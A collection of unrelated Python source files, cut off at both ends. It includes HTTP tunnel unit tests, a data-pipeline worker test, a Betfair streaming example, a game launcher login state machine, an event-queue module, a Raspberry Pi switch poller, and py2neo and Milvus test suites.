self.conn.set_tunnel(tunnel_host, port=tunnel_port,
headers=tunnel_headers)
self.conn.request('HEAD', '/', '')
self.assertEqual(self.conn.sock.host, self.host)
self.assertEqual(self.conn.sock.port, client.HTTP_PORT)
self.assertEqual(self.conn._tunnel_host, tunnel_host)
self.assertEqual(self.conn._tunnel_port, tunnel_port)
self.assertEqual(self.conn._tunnel_headers, tunnel_headers)
def test_disallow_set_tunnel_after_connect(self):
# Once connected, we shouldn't be able to tunnel anymore
self.conn.connect()
self.assertRaises(RuntimeError, self.conn.set_tunnel,
'destination.com')
def test_connect_with_tunnel(self):
self.conn.set_tunnel('destination.com')
self.conn.request('HEAD', '/', '')
self.assertEqual(self.conn.sock.host, self.host)
self.assertEqual(self.conn.sock.port, client.HTTP_PORT)
self.assertIn(b'CONNECT destination.com', self.conn.sock.data)
# issue22095
self.assertNotIn(b'Host: destination.com:None', self.conn.sock.data)
self.assertIn(b'Host: destination.com', self.conn.sock.data)
# This test should be removed when CONNECT gets the HTTP/1.1 blessing
self.assertNotIn(b'Host: proxy.com', self.conn.sock.data)
def test_connect_put_request(self):
self.conn.set_tunnel('destination.com')
self.conn.request('PUT', '/', '')
self.assertEqual(self.conn.sock.host, self.host)
self.assertEqual(self.conn.sock.port, client.HTTP_PORT)
self.assertIn(b'CONNECT destination.com', self.conn.sock.data)
self.assertIn(b'Host: destination.com', self.conn.sock.data)
def test_tunnel_debuglog(self):
expected_header = 'X-Dummy: 1'
response_text = 'HTTP/1.0 200 OK\r\n{}\r\n\r\n'.format(expected_header)
self.conn.set_debuglevel(1)
self.conn._create_connection = self._create_connection(response_text)
self.conn.set_tunnel('destination.com')
with support.captured_stdout() as output:
self.conn.request('PUT', '/', '')
lines = output.getvalue().splitlines()
self.assertIn('header: {}'.format(expected_header), lines)
@support.reap_threads
def test_main(verbose=None):
support.run_unittest(HeaderTests, OfflineTest, BasicTest, TimeoutTest,
PersistenceTest,
HTTPSTest, RequestBodyTest, SourceAddressTest,
HTTPResponseTest, ExtendedReadTest,
ExtendedReadTestChunked, TunnelTests)
if __name__ == '__main__':
test_main()
|
test_worker.py
|
import unittest
from threading import Thread
from unittest.mock import MagicMock, patch
import multiprocessing as mp
from . import _TestDataMixin
from extra_foam.pipeline.exceptions import ProcessingError, StopPipelineError
from extra_foam.pipeline.f_worker import TrainWorker, PulseWorker
from extra_foam.config import config, ExtensionType
from extra_foam.pipeline.f_zmq import FoamZmqClient
import numpy as np
from karabo_bridge import Client
@patch.dict(config._data, {"DETECTOR": "LPD"})
class TestWorker(_TestDataMixin, unittest.TestCase):
@classmethod
def setUpClass(cls):
cls._pause_ev = mp.Event()
cls._close_ev = mp.Event()
@patch('extra_foam.ipc.ProcessLogger.debug')
@patch('extra_foam.ipc.ProcessLogger.error')
def testRunTasks(self, error, debug):
for kls in (TrainWorker, PulseWorker):
worker = kls(self._pause_ev, self._close_ev)
for proc in worker._tasks:
proc.update = MagicMock()
proc.process = MagicMock()
worker._run_tasks({})
proc = worker._tasks[0]
# test responses to different Exceptions
proc.process.side_effect = ValueError()
worker._run_tasks({})
debug.assert_called_once()
self.assertIn("Unexpected Exception", debug.call_args_list[0][0][0])
debug.reset_mock()
error.assert_called_once()
error.reset_mock()
proc.process.side_effect = ProcessingError()
worker._run_tasks({})
debug.assert_called_once()
self.assertNotIn("Unexpected Exception", debug.call_args_list[0][0][0])
debug.reset_mock()
error.assert_called_once()
error.reset_mock()
proc.process.side_effect = StopPipelineError()
with self.assertRaises(StopPipelineError):
worker._run_tasks({})
debug.reset_mock()
error.reset_mock()
# Check that the extensions are enabled appropriately
extensions_enabled = kls == TrainWorker
self.assertEqual(worker._extension != None, extensions_enabled)
self.assertEqual(worker._detector_extension != None, extensions_enabled)
@patch('extra_foam.ipc.ProcessLogger.debug')
def testExtensions(self, _):
worker = TrainWorker(self._pause_ev, self._close_ev)
# Disable processors
worker._run_tasks = MagicMock()
# Generate mock data
mock_data = self.simple_data(1, (10, 10))[0]
detector, key = mock_data["catalog"].main_detector.split()
# Mock the input and output pipes
worker._input.start = MagicMock()
worker._input.get = MagicMock(return_value=mock_data)
worker._output = MagicMock()
# Mock the database configuration for the extension ZmqOutQueue's
extension_endpoint = "ipc://foam-extension"
detector_extension_endpoint = "ipc://bridge-extension"
worker._extension._meta.hget_all = MagicMock(return_value={ ExtensionType.ALL_OUTPUT.value: extension_endpoint })
worker._detector_extension._meta.hget_all = MagicMock(return_value={ ExtensionType.DETECTOR_OUTPUT.value: detector_extension_endpoint })
# Start worker
self._pause_ev.set()
worker_thread = Thread(target=worker.run)
worker_thread.start()
# Create clients
bridge_client = Client(detector_extension_endpoint, timeout=1)
foam_client = FoamZmqClient(extension_endpoint, timeout=1)
# Test received detector data
detector_data, _ = bridge_client.next()
np.testing.assert_array_equal(detector_data[f"EF_{detector}"][key],
mock_data["processed"].image.masked_mean)
# Test received special suite data
foam_data = foam_client.next()
for key in foam_data:
if key != "processed":
self.assertEqual(foam_data[key], mock_data[key])
else:
# Just comparing the detector image is enough for the
# ProcessedData object.
np.testing.assert_array_equal(foam_data[key].image.masked_mean,
mock_data[key].image.masked_mean)
# Close worker
self._close_ev.set()
worker_thread.join(timeout=1)
|
examplestreaming.py
|
import logging
import queue
import threading
import betfairlightweight
from betfairlightweight.filters import (
streaming_market_filter,
streaming_market_data_filter,
)
# setup logging
logging.basicConfig(level=logging.INFO) # change to DEBUG to see log all updates
# create trading instance (app key must be activated for streaming)
trading = betfairlightweight.APIClient("username", "password", app_key="appKey")
# login
trading.login()
# create queue
output_queue = queue.Queue()
# create stream listener
listener = betfairlightweight.StreamListener(output_queue=output_queue)
# create stream
stream = trading.streaming.create_stream(listener=listener)
# create filters (GB WIN racing)
market_filter = streaming_market_filter(
event_type_ids=["7"], country_codes=["GB"], market_types=["WIN"]
)
market_data_filter = streaming_market_data_filter(
fields=["EX_BEST_OFFERS", "EX_MARKET_DEF"], ladder_levels=3
)
# subscribe
streaming_unique_id = stream.subscribe_to_markets(
market_filter=market_filter,
market_data_filter=market_data_filter,
conflate_ms=1000, # send update every 1000ms
)
# start stream in a new thread (in production would need err handling)
t = threading.Thread(target=stream.start, daemon=True)
t.start()
"""
Data can also be accessed by using the snap function in the listener, e.g:
market_books = listener.snap(
market_ids=[1.12345323]
)
Errors need to be caught at stream.start, resubscribe can then be used to
prevent full image being sent, e.g:
streaming_unique_id = stream.subscribe_to_markets(
market_filter=market_filter,
market_data_filter=market_data_filter,
conflate_ms=1000, # send update every 1000ms
initial_clk=listener.initial_clk,
clk=listener.clk,
)
The streaming unique id is returned in the market book which allows multiple
streams to be differentiated if multiple streams feed into the same queue.
"""
# check for updates in output queue
while True:
market_books = output_queue.get()
print(market_books)
for market_book in market_books:
print(
market_book,
market_book.streaming_unique_id, # unique id of stream (returned from subscribe request)
market_book.streaming_update, # json update received
market_book.market_definition, # streaming definition, similar to catalogue request
market_book.publish_time, # betfair publish time of update
)
|
launcher.py
|
"""
TODO LIST:
- Get mirai python built with _ssl and bz2
- Fix up patcher.
- Graphical User Interface (inb4 python needs m0ar)
"""
from fsm.FSM import FSM
import urllib, json, sys, os, subprocess, threading, time, stat, getpass
import settings, localizer, messagetypes
from urllib.request import urlopen
from urllib.parse import urlencode
import os
import http.client as httplib
class TTRLauncher(FSM):
"""
This is the "main" class that powers the Toontown Rewritten launcher. It manages
everything the launcher needs to do, including manage all the "sub-threads" that
carry out tasks such as patching.
As of right now, the launcher consists of 3 threads:
- "main-thread": This is the thread which holds this class, and keeps everything
running properly. This also manages state transitions as well as submitting
data to and from the web server.
- "graphical": This thread will hold the GUI side of the launcher, such as abs
wyPython interface. Usually, this is what the end user will see when running the
launcher.
- "patcher": Since the majority of the patching process is locking, it has to be
run on a separate thread to keep the main thread alive. This thread will deal with
all the files it needs to download, as well as update/patch. During the download
process, the patcher will also report back the current download percentage of the
current file it is downloading.
ERR001: This occurs when the website returns broken JSON.
ERR002: This occurs when the website returns a Non-OK response when authenticating.
ERR003: We got a response, but the data received was invalid.
ERR004: The response said our login was invalid (failed).
ERR005: User tried to submit TFA code without entering anything.
ERR006: Account server is temporarily unavailable (HTTP 503).
"""
def __init__(self, input, output):
FSM.__init__(self)
self.input = input
self.output = output
self.transitions = {'Off': [
'CheckForUpdates', 'Off', 'LaunchGame'],
'CheckForUpdates': [
'Patch', 'Off'],
'GetCredentials': [
'SubmitCredentials', 'Off'],
'SubmitCredentials': [
'LoginResponse', 'Off'],
'LoginResponse': [
'GetCredentials', 'GetTFACode', 'Delayed', 'LaunchGame', 'Off'],
'GetTFACode': [
'SubmitTFACode', 'GetCredentials', 'Off'],
'SubmitTFACode': [
'LoginResponse', 'Off'],
'Delayed': [
'CheckQueue', 'Off'],
'CheckQueue': [
'LoginResponse', 'Off'],
'Patch': [
'GetCredentials', 'Off'],
'LaunchGame': [
'GetCredentials', 'Off']}
self.version = settings.Version
self.connection = None
self.gameserver = None
self.cookie = None
self.authToken = None
self.authBanner = None
self.appToken = None
self.queueToken = None
self.patcher = None
self.interface = None
self.credentials = None
self.dontClearMessage = False
return
def sendOutput(self, data):
self.output.put(data, block=True, timeout=0.5)
def start(self):
self.sendOutput((messagetypes.LAUNCHER_STATUS, ''))
self.request('CheckForUpdates')
def enterCheckForUpdates(self):
self.request('Patch')
return
def enterGetCredentials(self):
if self.dontClearMessage:
self.dontClearMessage = False
else:
self.sendOutput((messagetypes.LAUNCHER_STATUS, ''))
if self.credentials is None:
username, password = self.input.get(block=True, timeout=None)
self.credentials = (username, password)
else:
username, password = self.credentials
self.request('SubmitCredentials', username, password)
return
def enterSubmitCredentials(self, username, password):
self.sendOutput((messagetypes.LAUNCHER_STATUS, localizer.GUI_Authing))
self.connection = httplib.HTTPSConnection(*settings.SSLConnection)
headers = {'Content-type': 'application/x-www-form-urlencoded'}
params = urlencode({'username': username.encode('utf8'),
'password': password.encode('utf8')})
self.connection.request('POST', settings.LoginPostLocation, params, headers)
self.request('LoginResponse')
def enterLoginResponse(self):
try:
response = self.connection.getresponse()
except httplib.BadStatusLine:
self.sendOutput((messagetypes.LAUNCHER_ERROR, 'ERR006: %s' % localizer.ERR_AccServerDown))
self.credentials = None
self.request('GetCredentials')
else:
if response.status == httplib.SERVICE_UNAVAILABLE:
self.sendOutput((messagetypes.LAUNCHER_ERROR, 'ERR006: %s' % localizer.ERR_AccServerDown))
self.credentials = None
self.request('GetCredentials')
if response.status != httplib.OK:
self.sendOutput((messagetypes.LAUNCHER_ERROR, 'ERR002: %s' % localizer.ERR_Non200Resp % {'response': str(response.status)}))
self.credentials = None
self.request('GetCredentials')
try:
data = json.loads(response.read().decode('utf-8'))
except:
self.sendOutput((messagetypes.LAUNCHER_ERROR, 'ERR001: %s' % localizer.ERR_JSONParseError))
print("json parse error in area 1")
self.request('Off')
success = data.get('success', 'false')
self.connection.close()
self.connection = None
if success == 'true':
self.cookie = data.get('cookie', 'NoCookieGiven')
self.gameserver = data.get('gameserver', 'NoServerGiven')
self.request('LaunchGame')
else:
if success == 'false':
self.sendOutput((messagetypes.LAUNCHER_ERROR, data.get('banner', localizer.ERR_InvalidLogin)))
self.credentials = None
self.request('GetCredentials')
self.sendOutput(messagetypes.LAUNCHER_CLEAR_PASSWORD)
else:
if success == 'partial':
self.authToken = data.get('responseToken', None)
self.authBanner = data.get('banner', '')
self.request('GetTFACode')
else:
if success == 'delayed':
eta = int(data.get('eta', 5))
self.sendOutput((messagetypes.LAUNCHER_STATUS, localizer.GUI_Queue % eta))
self.queueToken = data.get('queueToken', None)
self.request('Delayed', eta)
return
def enterGetTFACode(self):
if self.authToken is None:
self.sendOutput((messagetypes.LAUNCHER_ERROR, 'ERR005: %s' % localizer.ERR_TFAWithoutToken))
self.request('Off')
self.sendOutput((messagetypes.LAUNCHER_STATUS, ''))
self.sendOutput((messagetypes.LAUNCHER_REQUEST_TFA, self.authBanner))
self.appToken = self.input.get(block=True, timeout=None)
if self.appToken is None:
self.credentials = None
self.request('GetCredentials')
self.request('SubmitTFACode')
return
def enterSubmitTFACode(self):
self.sendOutput((messagetypes.LAUNCHER_STATUS, localizer.GUI_Authing))
self.connection = httplib.HTTPSConnection(*settings.SSLConnection)
headers = {'Content-type': 'application/x-www-form-urlencoded'}
params = urlencode({'appToken': self.appToken,
'authToken': self.authToken})
self.connection.request('POST', settings.LoginPostLocation, params, headers)
self.request('LoginResponse')
def enterDelayed(self, timeDelay):
if self.queueToken is None:
self.sendOutput((messagetypes.LAUNCHER_ERROR, 'ERR007: %s' % localizer.ERR_DelayWithoutToken))
self.request('Off')
time.sleep(max(timeDelay, 1))
self.request('CheckQueue')
return
def enterCheckQueue(self):
self.connection = httplib.HTTPSConnection(*settings.SSLConnection)
headers = {'Content-type': 'application/x-www-form-urlencoded'}
params = urlencode({'queueToken': self.queueToken})
self.connection.request('POST', settings.LoginPostLocation, params, headers)
self.request('LoginResponse')
def enterPatch(self):
from patcher import Patcher
self.patcher = threading.Thread(target=Patcher.Patch, name='Patcher-Thread', args=(self.__updateProgress, self.__updateFile))
self.patcher.daemon = True
self.patcher.start()
self.request('GetCredentials')
def __updateProgress(self, percentage):
if self.output.empty():
self.sendOutput((messagetypes.LAUNCHER_PROGRESS, percentage))
def __updateFile(self, fileCount):
#if self.output.empty():
self.sendOutput((messagetypes.LAUNCHER_STATUS, fileCount))
def exitPatch(self):
self.sendOutput((messagetypes.LAUNCHER_PROGRESS, -1))
def enterLaunchGame(self):
os.environ['TTR_PLAYCOOKIE'] = self.cookie
os.environ['TTR_GAMESERVER'] = self.gameserver
if sys.platform == 'win32':
game = subprocess.Popen('TTREngine', creationflags=134217728)
else:
modes = os.stat('TTREngine').st_mode
if not modes & stat.S_IXUSR:
os.chmod('TTREngine', modes | stat.S_IXUSR)
game = subprocess.Popen('./TTREngine')
self.sendOutput((messagetypes.LAUNCHER_STATUS, localizer.GUI_PlayGameFarewell))
time.sleep(1)
self.sendOutput(messagetypes.LAUNCHER_HIDE)
while game.poll() is None:
time.sleep(1.5)
os.system("/app/bin/wmclass") #Sets the WM_CLASS of Toontown Rewritten so that DE can show icon
if game.returncode == 0:
self.sendOutput(messagetypes.LAUNCHER_CLEAR_PASSWORD)
self.sendOutput(messagetypes.LAUNCHER_SHOW)
self.sendOutput(messagetypes.LAUNCHER_ENABLE_CONTROLS)
self.credentials = None
self.dontClearMessage = True
self.sendOutput((messagetypes.LAUNCHER_STATUS, localizer.GUI_PlayAgain))
time.sleep(1.5)
self.request('GetCredentials')
return
self.sendOutput(messagetypes.LAUNCHER_SHOW)
self.sendOutput(messagetypes.LAUNCHER_PLAY_RETRY)
if self.input.get(block=True, timeout=None):
self.request('GetCredentials')
else:
self.request('Off')
return
def enterOff(self):
if self.connection is not None:
self.connection.close()
self.sendOutput(messagetypes.LAUNCHER_EXIT)
return
|
__init__.py
|
##########
##
## SPDX-License-Identifier: MIT
##
## Copyright (c) 2017-2022 James M. Putnam <putnamjm.design@gmail.com>
##
##########
##########
##
## events
##
##########
"""Manage retrograde events
See module gra-afch for display/RTC events.
See module retro for system events.
Classes:
Event
Functions:
dump(object, file)
dumps(object) -> string
load(file) -> object
loads(string) -> object
event()
find_event(module)
make_event(module, type_, arg)
register(module, fn)
send_event(ev)
Misc variables:
VERSION
"""
import json
import sys
from threading import Thread, Lock
from time import localtime, strftime, time, sleep
from datetime import datetime
##########
#
# event format:
#
# { "module": { "event" : arg } }
#
# module: event, retro, gra-afch, integration
# event: button, timer, alarm, ui-control, integration, exec
# arg: context-based
#
# sneak in a timestamp somehow?
#
class Event:
"""the event class
"""
VERSION = '0.0.3'
_conf_dict = None
_queue = None
_queue_lock = None
_modules_lock = None
_modules = None
# this gives us around one second event latency
_HIGH_WATER_MARK = 28
_LOW_WATER_MARK = 0
def _lock_module(self, module):
with self._modules_lock:
for lock_desc in self._modules:
module_, lock_, _ = lock_desc
if module == module_:
return lock_
assert False
return None
def register(self, module_, fn):
"""register a module event thread
create a per-module event thread and lock
and bind them to module.
the module event thread waits on the lock
by calling find_event until somebody does
a send_event with their tag.
there shouldn't be any events already on
queue for a unregistered module, if we want
to allow that we can grovel through the
queue and set the lock state accordingly
like find_event.
"""
with self._modules_lock:
lock_ = Lock()
lock_.acquire()
thread_ = Thread(target=fn)
self._modules.append((module_, lock_, thread_))
thread_.start()
def find_event(self, module):
"""find a module event
unless there are one or more events on
the queue for module, wait until
send_event releases the wait lock.
"""
def in_queue():
return next((x for x in self._queue if module in x), None)
def_ = None
lock_ = self._lock_module(module)
lock_.acquire()
with self._queue_lock:
def_ = in_queue()
assert def_
self._queue.remove(def_)
if in_queue() and lock_.locked():
lock_.release()
return def_
def send_event(self, ev):
"""push an event on the event queue
release the module event lock if
it is already locked.
module locks are only changed
with the queue lock held, so
this is safe.
"""
module_ = list(ev)[0]
type_ = ev[module_]
lock_ = self._lock_module(module_)
if len(self._queue) > self._HIGH_WATER_MARK:
if 'event' != type_:
while len(self._queue) > self._LOW_WATER_MARK:
sleep(0.0)
with self._queue_lock:
self._queue.append(ev)
if lock_.locked():
lock_.release()
def make_event(self, module, type_, arg):
"""find a module event
unless there are one or more events on
the queue for module, wait until
send_event releases the wait lock.
"""
fmt = '{{ "{}": {{ "{}": "{}" }} }}'
# print('make event: ', end='')
# print(fmt.format(module, type_, arg))
# print(datetime.now().strftime('%H:%M:%S:%f'))
self.send_event(json.loads(fmt.format(module, type_, arg)))
def exec_(self, op):
"""find a module event
unless there are one or more events on
the queue for module, wait until
send_event releases the wait lock.
"""
step = op['exec']
if 'repeat' in step:
def_ = step['repeat']
count_ = def_['count']
if isinstance(count_, bool):
while count_:
for op_ in def_['block']:
self.send_event(op_)
elif isinstance(count_, int):
for _ in range(count_):
for op_ in def_['block']:
self.send_event(op_)
else:
assert False
elif 'block' in step:
for op_ in step['block']:
self.send_event(op_)
else:
assert False
def config(self):
return self._conf_dict
def __init__(self, module):
"""create an event object
"""
def event_proc():
while True:
ev = self.find_event('event')
self.exec_(ev['event'])
self._conf_dict = []
with open(module.path(__file__, 'conf.json'), 'r') as file:
self._conf_dict = json.load(file)
self._queue_lock = Lock()
self._queue = []
self._modules_lock = Lock()
self._modules = []
self.register('event', event_proc)
|
switch.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import time
import threading
import RPi.GPIO as GPIO
DEBUG_MODE = False
SW_PIN = 20
#
E_EDGE_BIT = 0x01
R_EDGE_BIT = 0x02
F_EDGE_BIT = 0x04
#
L_PRESS_BIT = 0x01
L_PRESS_CNT_MAX = 30
#
POLLING_INT = 0.05
class Switch():
def __init__(self, PIN):
# Set GPIO pin input and pull-down
GPIO.setup(PIN, GPIO.IN, pull_up_down=GPIO.PUD_DOWN)
# Generate Thread and Flag
self.sw_event = threading.Event()
self.stop_event = threading.Event()
self.running_flag = threading.Event()
self.thread = threading.Thread(target = self.run)
# Initialize Variable
self.__pin = PIN
self.__status = False
self.__edgeFlag = 0x00
self.__longFlag = 0x00
self.__longPressCnt = 0
# Start
self.running_flag.set()
self.thread.start()
def getEdgeFlag(self):
return self.__edgeFlag
def clearEdgeFlag(self):
self.__edgeFlag = 0x00
def getLongFlag(self):
return self.__longFlag
def clearLongFlag(self):
self.__longFlag = 0x00
self.__longPressCnt = 0
def run(self):
while not self.stop_event.is_set():
self.running_flag.wait()
tmp_status = GPIO.input(self.__pin)
# Rising Edge
if tmp_status == True and self.__status == False:
self.__edgeFlag |= (E_EDGE_BIT | R_EDGE_BIT)
self.__longPressCnt = 0
self.sw_event.set()
# Falling Edge
elif tmp_status == False and self.__status == True:
self.__edgeFlag |= (E_EDGE_BIT | F_EDGE_BIT)
self.__longPressCnt = 0
self.sw_event.set()
# Continuous High
elif tmp_status == True and self.__status == True:
self.__longPressCnt += 1
if self.__longPressCnt == L_PRESS_CNT_MAX: # only first time
self.__longFlag |= (L_PRESS_BIT)
self.sw_event.set()
self.__longPressCnt = 0
# Continuous Lown
elif tmp_status == False and self.__status == False:
self.__longPressCnt = 0
self.__status = tmp_status # Update Switch Status
time.sleep(POLLING_INT)
if DEBUG_MODE:
print " break run loop"
def stop(self):
if DEBUG_MODE:
print "Stop Thread"
self.stop_event.set()
self.thread.join()
def suspend(self):
self.running_flag.clear()
def resume(self):
self.running_flag.set()
def main_loop():
while True:
if s1.sw_event.is_set():
print "----------------------"
print "E: " + str(s1.getEdgeFlag() & E_EDGE_BIT)
print "R: " + str(s1.getEdgeFlag() & R_EDGE_BIT)
print "F: " + str(s1.getEdgeFlag() & F_EDGE_BIT)
print "L: " + str(s1.getLongFlag() & L_PRESS_BIT)
s1.clearEdgeFlag()
s1.clearLongFlag()
s1.sw_event.clear()
time.sleep(0.1)
if __name__ == '__main__':
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM) # Use BCM GPIO numbers
s1 = Switch(SW_PIN)
try:
main_loop()
except KeyboardInterrupt:
print "Keyboard Interrupt"
finally:
s1.stop()
GPIO.cleanup()
print "Good Bye!"
|
test_graph.py
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# Copyright 2011-2020, Nigel Small
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from pytest import raises, skip, mark
from py2neo import Graph, Node, Relationship
def test_same_uri_gives_same_instance(graph):
uri = graph.service.uri
graph_1 = Graph(uri)
graph_2 = Graph(uri)
assert graph_1 is graph_2
def test_graph_len_returns_number_of_rels(graph):
size = len(graph)
statement = "MATCH ()-[r]->() RETURN COUNT(r)"
num_rels = graph.evaluate(statement)
assert size == num_rels
def test_graph_bool_returns_true(graph):
assert graph.__bool__()
assert graph.__nonzero__()
def test_graph_contains(graph):
node = Node()
graph.create(node)
assert node.graph is graph
def test_graph_is_not_equal_to_non_graph(graph):
graph = Graph()
assert graph != object()
def test_can_create_and_delete_node(graph):
a = Node()
graph.create(a)
assert isinstance(a, Node)
assert a.graph == graph
assert a.identity is not None
assert graph.exists(a)
graph.delete(a)
assert not graph.exists(a)
def test_can_create_and_delete_relationship(graph):
ab = Relationship(Node(), "KNOWS", Node())
graph.create(ab)
assert isinstance(ab, Relationship)
assert ab.graph == graph
assert ab.identity is not None
assert graph.exists(ab)
graph.delete(ab | ab.start_node | ab.end_node)
assert not graph.exists(ab)
def test_can_get_node_by_id_when_cached(graph):
node = Node()
graph.create(node)
assert node.identity in graph.node_cache
got = graph.nodes.get(node.identity)
assert got is node
def test_can_get_node_by_id_when_not_cached(graph):
node = Node()
graph.create(node)
graph.node_cache.clear()
assert node.identity not in graph.node_cache
got = graph.nodes.get(node.identity)
assert got.identity == node.identity
def test_get_non_existent_node_by_id(graph):
node = Node()
graph.create(node)
node_id = node.identity
graph.delete(node)
graph.node_cache.clear()
with raises(KeyError):
_ = graph.nodes[node_id]
assert graph.nodes.get(node_id) is None
def test_node_cache_is_thread_local(graph):
from threading import Thread
node = Node()
graph.create(node)
assert node.identity in graph.node_cache
other_cache_keys = []
def check_cache():
other_cache_keys.extend(graph.node_cache.keys())
thread = Thread(target=check_cache)
thread.start()
thread.join()
assert node.identity in graph.node_cache
assert node.identity not in other_cache_keys
def test_can_get_same_instance(graph):
graph_1 = Graph()
graph_2 = Graph()
assert graph_1 is graph_2
def test_create_single_empty_node(graph):
a = Node()
graph.create(a)
assert a.graph == graph
assert a.identity is not None
def test_get_node_by_id(graph):
a1 = Node(foo="bar")
graph.create(a1)
a2 = graph.nodes.get(a1.identity)
assert a1 == a2
def test_create_node_with_mixed_property_types(graph):
a = Node.cast({"number": 13, "foo": "bar", "true": False, "fish": "chips"})
graph.create(a)
assert len(a) == 4
assert a["fish"] == "chips"
assert a["foo"] == "bar"
assert a["number"] == 13
assert not a["true"]
def test_create_node_with_null_properties(graph):
a = Node.cast({"foo": "bar", "no-foo": None})
graph.create(a)
assert a["foo"] == "bar"
assert a["no-foo"] is None
@mark.skip
def test_bolt_connection_pool_usage_for_autocommit(graph):
connector = graph.service.connector
if "bolt" not in connector.scheme:
skip("Bolt tests are only valid for Bolt connectors")
pool = connector.pool
address = connector.connection_data["host"], connector.connection_data["port"]
n = len(pool.connections)
assert pool.in_use_connection_count(address) == 0
cursor = graph.run("RETURN 1")
assert 1 <= len(pool.connections) <= n + 1
assert pool.in_use_connection_count(address) in {0, 1}
n = len(pool.connections)
cursor.summary()
assert len(pool.connections) == n
assert pool.in_use_connection_count(address) == 0
@mark.skip
def test_bolt_connection_reuse_for_autocommit(graph):
connector = graph.service.connector
if "bolt" not in connector.scheme:
skip("Bolt tests are only valid for Bolt connectors")
pool = connector.pool
address = connector.connection_data["host"], connector.connection_data["port"]
n = len(pool.connections)
assert pool.in_use_connection_count(address) == 0
cursor = graph.run("RETURN 1")
assert 1 <= len(pool.connections) <= n + 1
assert pool.in_use_connection_count(address) in {0, 1}
n = len(pool.connections)
cursor.summary()
assert len(pool.connections) == n
assert pool.in_use_connection_count(address) == 0
cursor = graph.run("RETURN 1")
assert len(pool.connections) == n
assert pool.in_use_connection_count(address) in {0, 1}
cursor.summary()
assert len(pool.connections) == n
assert pool.in_use_connection_count(address) == 0
@mark.skip
def test_bolt_connection_pool_usage_for_begin_commit(graph):
connector = graph.service.connector
if "bolt" not in connector.scheme:
skip("Bolt tests are only valid for Bolt connectors")
pool = connector.pool
address = connector.connection_data["host"], connector.connection_data["port"]
n = len(pool.connections)
assert pool.in_use_connection_count(address) == 0
tx = graph.begin()
assert 1 <= len(pool.connections[address]) <= n + 1
assert pool.in_use_connection_count(address) == 1
n = len(pool.connections)
tx.commit()
assert len(pool.connections) == n
assert pool.in_use_connection_count(address) == 0
@mark.skip
def test_bolt_connection_pool_usage_for_begin_rollback(graph):
connector = graph.service.connector
if "bolt" not in connector.scheme:
skip("Bolt tests are only valid for Bolt connectors")
pool = connector.pool
address = connector.connection_data["host"], connector.connection_data["port"]
n = len(pool.connections)
assert pool.in_use_connection_count(address) == 0
tx = graph.begin()
assert 1 <= len(pool.connections) <= n + 1
assert pool.in_use_connection_count(address) == 1
n = len(pool.connections)
tx.rollback()
assert len(pool.connections) == n
assert pool.in_use_connection_count(address) == 0
|
test_search_20.py
|
import pytest
from time import sleep
from base.client_base import TestcaseBase
from utils.util_log import test_log as log
from common import common_func as cf
from common import common_type as ct
from common.common_type import CaseLabel, CheckTasks
from utils.utils import *
from common.constants import *
prefix = "search_collection"
search_num = 10
max_dim = ct.max_dim
epsilon = ct.epsilon
gracefulTime = ct.gracefulTime
default_nb = ct.default_nb
default_nb_medium = ct.default_nb_medium
default_nq = ct.default_nq
default_dim = ct.default_dim
default_limit = ct.default_limit
default_search_exp = "int64 >= 0"
default_search_field = ct.default_float_vec_field_name
default_search_params = ct.default_search_params
default_int64_field_name = ct.default_int64_field_name
default_float_field_name = ct.default_float_field_name
default_bool_field_name = ct.default_bool_field_name
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
uid = "test_search"
nq = 1
epsilon = 0.001
field_name = default_float_vec_field_name
binary_field_name = default_binary_vec_field_name
search_param = {"nprobe": 1}
entity = gen_entities(1, is_normal=True)
entities = gen_entities(default_nb, is_normal=True)
raw_vectors, binary_entities = gen_binary_entities(default_nb)
default_query, _ = gen_search_vectors_params(field_name, entities, default_top_k, nq)
# default_binary_query, _ = gen_search_vectors_params(binary_field_name, binary_entities, default_top_k, nq)
class TestCollectionSearchInvalid(TestcaseBase):
""" Test case of search interface """
@pytest.fixture(scope="function", params=ct.get_invalid_vectors)
def get_invalid_vectors(self, request):
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_fields_type(self, request):
if isinstance(request.param, str):
pytest.skip("string is valid type for field")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_fields_value(self, request):
if not isinstance(request.param, str):
pytest.skip("field value only support string")
if request.param == "":
pytest.skip("empty field is valid")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_metric_type(self, request):
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_ints)
def get_invalid_limit(self, request):
if isinstance(request.param, int) and request.param >= 0:
pytest.skip("positive int is valid type for limit")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_expr_type(self, request):
if isinstance(request.param, str):
pytest.skip("string is valid type for expr")
if request.param is None:
pytest.skip("None is valid for expr")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_expr_value(self, request):
if not isinstance(request.param, str):
pytest.skip("expression value only support string")
if request.param == "":
pytest.skip("empty field is valid")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_partition(self, request):
if request.param == []:
pytest.skip("empty is valid for partition")
if request.param is None:
pytest.skip("None is valid for partition")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_output_fields(self, request):
if request.param == []:
pytest.skip("empty is valid for output_fields")
if request.param is None:
pytest.skip("None is valid for output_fields")
yield request.param
"""
******************************************************************
# The followings are invalid cases
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L1)
def test_search_no_connection(self):
"""
target: test search without connection
method: create and delete connection, then search
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. remove connection
log.info("test_search_no_connection: removing connection")
self.connection_wrap.remove_connection(alias='default')
log.info("test_search_no_connection: removed connection")
# 3. search without connection
log.info("test_search_no_connection: searching without connection")
